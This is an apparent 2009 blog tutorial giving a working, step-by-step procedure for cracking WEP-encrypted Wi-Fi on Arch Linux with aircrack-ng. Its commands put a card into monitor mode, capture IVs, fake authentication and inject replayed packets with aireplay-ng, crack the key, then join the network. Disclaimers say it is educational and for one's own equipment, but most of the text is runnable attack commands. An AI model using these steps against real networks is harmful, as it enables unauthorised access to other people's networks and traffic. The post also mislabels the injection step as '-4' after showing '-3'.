WEP network cracking using Realtek ALFA based WIFI cards
Tuesday, November 17th, 2009There are many guides teaching people how to do this. You're probably wondering why I wrote my own. Simply put most of them are wrong/outdated and don't work anymore. This is a working one for Arch linux using aircrack-ng
First off - WEP encryption is not a good idea. Use WPA/WAP2.
Secondly - using people's network wether encrypted or not is illegal. So don't do it.
Thirdly - this is purely for educational purposes. And should only be done using your equipement
The easiest way to try this out is to get a spare router or to use a Nokia Nseries wifi capable phone as a WIFI point using JoikuSpot. Find what the MAC address of the hotspot is, it's name, and it's channel. I will use channel 11 from now on, but you will have to use whatever channel your AP is on. Incidentally a great tool to do this from a Nokia n-series is Barbelo (unsupported but still works great)
You will need the aircrack-ng suite. Once armed with this the rest is easy. First thing to do is disable networkmanager. Just turn it off using:
(for arch/*bsd) - /etc/rc.d/networkmanager stop
(for ubuntu/fedora/opensuse) - /etc/init.d/networkmanager stop
- Enter Monitor Mode on the desired Wifi card
(this may give you a seperate network interface in my case mon0)
sudo airmon-ng start wlan1
- Use Airodump to monitor the networks (leave this running in the background)
sudo airodump-ng --ivs --channel 11 mon0 --write filename
(11 is for the channel number and --ivs is to only capture iv's)
- Use airplay to fake a connection
sudo aireplay-ng -1 0 -e 'NetworkName' -a MACOFAP -h MACOFWIFICARD mon0
- After faked authentification has gone well then injection time
sudo aireplay-ng -3 -e 'NetworkName' -a MACOFAP -h MACOFWIFICARD mon0
(there are other types of attack that are alot faster than this. However read in aireplay-ng if you want. Since this is for educational purproses I see no need in going into more details. The AP will be directly next to you so there is no need for more sophisticated attacks)
The trick is to get enough IVs. Basically airodump will show you a #data column for every AP arround. Watch your AP and the #data should go flying up after a while running aireplay -4. Once you get to ~10,000 for a 64bit key and 100,000 for a 128bit key then leave it running, just in case and try cracking as such :
aircrack-ng filename.something
The filename will be whatever you called it when running airodump. Look at the biggest file there. It will get pretty big since it is logging all IVs. The file extension might be .cap or something similar.
If you get something then you are king. Just use the following or start network manager again and enter the key without the colons and you are good to go. Now shove your AP back to WPA and if your neighbour is using WEP offer to change it for them 
You can call it your good deed for the day.
Connecting to the network using the cli as root :
ifconfig wlan0 up
iwconfig wlan0 essid "NetworkName" key THISISTHEKEY
dhcpcd wlan0